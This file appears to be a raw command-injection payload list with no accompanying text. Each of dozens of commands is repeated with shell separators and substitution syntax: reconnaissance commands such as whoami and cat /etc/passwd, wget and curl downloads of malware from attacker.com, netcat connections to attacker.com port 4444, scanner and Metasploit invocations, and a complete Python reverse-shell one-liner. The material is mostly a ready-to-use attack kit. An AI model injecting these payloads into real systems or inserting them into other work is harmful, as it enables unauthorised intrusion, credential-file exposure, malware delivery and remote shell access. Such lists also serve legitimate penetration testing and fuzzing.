; whoami
| whoami
& whoami
&& whoami
`whoami`
$(whoami)
; cat /etc/passwd
| cat /etc/passwd
& cat /etc/passwd
&& cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)
; ls -la
| ls -la
& ls -la
&& ls -la
`ls -la`
$(ls -la)
; id
| id
& id
&& id
`id`
$(id)
; pwd
| pwd
& pwd
&& pwd
`pwd`
$(pwd)
| dir
& dir
&& dir
`dir`
$(dir)
; net user
| net user
& net user
&& net user
`net user`
$(net user)
; ipconfig
| ipconfig
& ipconfig
&& ipconfig
`ipconfig`
$(ipconfig)
; ps aux
| ps aux
& ps aux
&& ps aux
`ps aux`
$(ps aux)
; netstat -an
| netstat -an
& netstat -an
&& netstat -an
`netstat -an`
$(netstat -an)
; route print
| route print
& route print
&& route print
`route print`
$(route print)
; arp -a
| arp -a
& arp -a
&& arp -a
`arp -a`
$(arp -a)
; nslookup google.com
| nslookup google.com
& nslookup google.com
&& nslookup google.com
`nslookup google.com`
$(nslookup google.com)
; ping -c 1 google.com
| ping -c 1 google.com
& ping -c 1 google.com
&& ping -c 1 google.com
`ping -c 1 google.com`
$(ping -c 1 google.com)
; traceroute google.com
| traceroute google.com
& traceroute google.com
&& traceroute google.com
`traceroute google.com`
$(traceroute google.com)
; dig google.com
| dig google.com
& dig google.com
&& dig google.com
`dig google.com`
$(dig google.com)
; host google.com
| host google.com
& host google.com
&& host google.com
`host google.com`
$(host google.com)
; wget http://attacker.com/malware
| wget http://attacker.com/malware
& wget http://attacker.com/malware
&& wget http://attacker.com/malware
`wget http://attacker.com/malware`
$(wget http://attacker.com/malware)
; curl http://attacker.com/malware
| curl http://attacker.com/malware
& curl http://attacker.com/malware
&& curl http://attacker.com/malware
`curl http://attacker.com/malware`
$(curl http://attacker.com/malware)
; nc attacker.com 4444
| nc attacker.com 4444
& nc attacker.com 4444
&& nc attacker.com 4444
`nc attacker.com 4444`
$(nc attacker.com 4444)
; nmap -sT attacker.com
| nmap -sT attacker.com
& nmap -sT attacker.com
&& nmap -sT attacker.com
`nmap -sT attacker.com`
$(nmap -sT attacker.com)
; nikto -h attacker.com
| nikto -h attacker.com
& nikto -h attacker.com
&& nikto -h attacker.com
`nikto -h attacker.com`
$(nikto -h attacker.com)
; sqlmap -u attacker.com
| sqlmap -u attacker.com
& sqlmap -u attacker.com
&& sqlmap -u attacker.com
`sqlmap -u attacker.com`
$(sqlmap -u attacker.com)
; msfconsole
| msfconsole
& msfconsole
&& msfconsole
`msfconsole`
$(msfconsole)
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
| python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
& python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
&& python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')
